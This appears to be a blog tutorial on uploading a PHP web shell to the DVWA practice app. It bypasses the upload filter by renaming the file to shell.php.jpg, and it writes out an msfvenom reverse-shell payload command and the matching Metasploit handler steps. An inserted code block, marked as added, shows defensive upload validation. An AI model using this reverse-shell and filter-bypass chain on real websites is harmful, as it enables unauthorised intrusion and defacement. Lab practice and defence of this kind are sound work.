Wednesday, 1 February 2017

Shell Upload with Metasploit (DVWA high security)

Steps and instructions -
Welcome to another tutorial from hacking monks 👽

Today we will be hacking a website by uploading a backdoor PHP file on high security DVWA using Metasploit, as promised.

First the basic terms -

DVWA - Damn Vulnerable Web App

Used as a dummy website for penetration testing.

Web Shell - A shell (here, a backdoor PHP file) is used to get an interactive command line on the website.

Upload panel - The place in a website where you upload a profile pic, avatar or GIF, like on Facebook.

Requirements -

* A Kali Machine.

Steps -

* Here I am using DVWA as my target website. In it we have an upload section which is similar to any website's upload panel.

First we will download a simple shell. I downloaded it from GitHub by searching for it on Google.

After the search I will go to the first website, which is GitHub.

Now we will download this shell

And it will be inside the download folder.

Copy it to the Desktop and unzip it.

Just open the zipped file and then drag the folder out.

You will get a PHP file inside the folder.

Now we will try to upload the file as it is (without bypassing any filter)

* In the DVWA we have an upload panel. I will upload this file there

I will browse through the folders and upload it

As I uploaded the file I got an error

As expected. The security is high.

Thus we have to bypass the upload filters.

* We have to rename our PHP file to shell.php.jpg

And when I upload it, surprisingly the panel accepted the file.

This means that DVWA has low security in a high security mode.

If you have watched my low and medium level security shell upload tutorial, you will already know that this is true.

We had to intercept our request and bypass size and name extension filters for medium level security.
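
From the defender's side, a filter that accepts the file after a rename is trusting the client-supplied name. The PHP below is an added example, not DVWA's code and not part of the original tutorial: it checks the name and the leading bytes, and returns a server-generated name to store the file under. The function name `validateUpload`, the allow-list and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example (not DVWA's code): validate an uploaded image by name and
// content, and never reuse the client-supplied file name on disk.

const ALLOWED = [            // assumed allow-list: extension => file signature
    'jpg' => "\xFF\xD8\xFF",
    'png' => "\x89PNG\r\n\x1A\n",
];
const SCRIPT_EXT = '/\.(php\d?|phtml|phar)(\.|$)/i';

/**
 * Returns the name to store the file under, or null if it is rejected.
 * $clientName is attacker-controlled; $bytes is the uploaded content.
 */
function validateUpload(string $clientName, string $bytes): ?string
{
    // 1. Reject a script extension anywhere in the name (shell.php.jpg).
    if (preg_match(SCRIPT_EXT, $clientName)) {
        return null;
    }
    // 2. The final extension must be on the allow-list.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // 3. The content must start with that type's signature.
    $sig = ALLOWED[$ext];
    if (strncmp($bytes, $sig, strlen($sig)) !== 0) {
        return null;
    }
    // 4. Store under a random name with exactly one known extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs (not taken from the tutorial's files).
$samples = [
    ['avatar.jpg',    "\xFF\xD8\xFF\xE0" . str_repeat("\0", 16)],
    ['shell.php.jpg', '<?php /* constructed placeholder */'],
    ['notes.jpg',     'plain text, not an image'],
];
foreach ($samples as [$name, $bytes]) {
    printf("%-14s => %s\n", $name, validateUpload($name, $bytes) ?? 'rejected');
}
```

The signature check only looks at the first bytes, so it is a secondary control. The control that matters is that the stored name is chosen by the server and carries a single image extension.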

Anyways we will move on.

Let's try and access the shell.

* Copy the file path it is showing

Now delete the part of the URL that comes after /dvwa/

And paste the path and access the shell

You will get this kind of a shell interface.

Here you can access the website like the admins do.

Here you can conduct post exploitation or deface the website.

Here you can try out your commands.

Now we will make a payload and upload it to the target website to get Meterpreter sessions in Metasploit.

We will build our own shell using MSFvenom.

* Open a terminal and type in 

"msfvenom -p php/meterpreter_reverse_tcp LHOST=(your IP) LPORT=4444 -f raw > Desktop/name.php"

Here -p is payload option,

LHOST is your listening IP address (your IP),

LPORT is the port you will be listening on.

Save it on desktop and name it anything with a .php extension

It will create a payload

It will give you an error like this. It's OK as long as you get the payload.

Note - The error should be the same error you see in the picture above.

As we already know, DVWA will not accept the .php extension.

So we need to rename our backdoor with a .jpg extension.

Now we will run Metasploit to set it up.

Open a new terminal and type "msfconsole" or use the shortcut menu to get into the Metasploit console.

Now we need to set up the handler.

Type in "use multi/handler"

"set payload php/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

then finally 

"exploit -j -Z"

This will listen for a connection to be established.

Meanwhile we have to upload our PHP file to the target website.

It will upload, as we have renamed our file extension.

Now copy the URL and paste it and see if it's uploaded or not.

It will not show you anything, but ....

When we move back to Metasploit, we will get a session open

If you want to see the active sessions type in "sessions -i"

This will show you the active sessions. You will get IDs.

If you want to access an active session, type "sessions -i (ID no)"

Say shell and do whatever you want to do man

Thank you guys for reading this tutorial. I will continue these upload tutorials as we have lots of filters to bypass.
If you have missed my last tutorial on Upload shell,

See them here -

Until then have a safe hack......
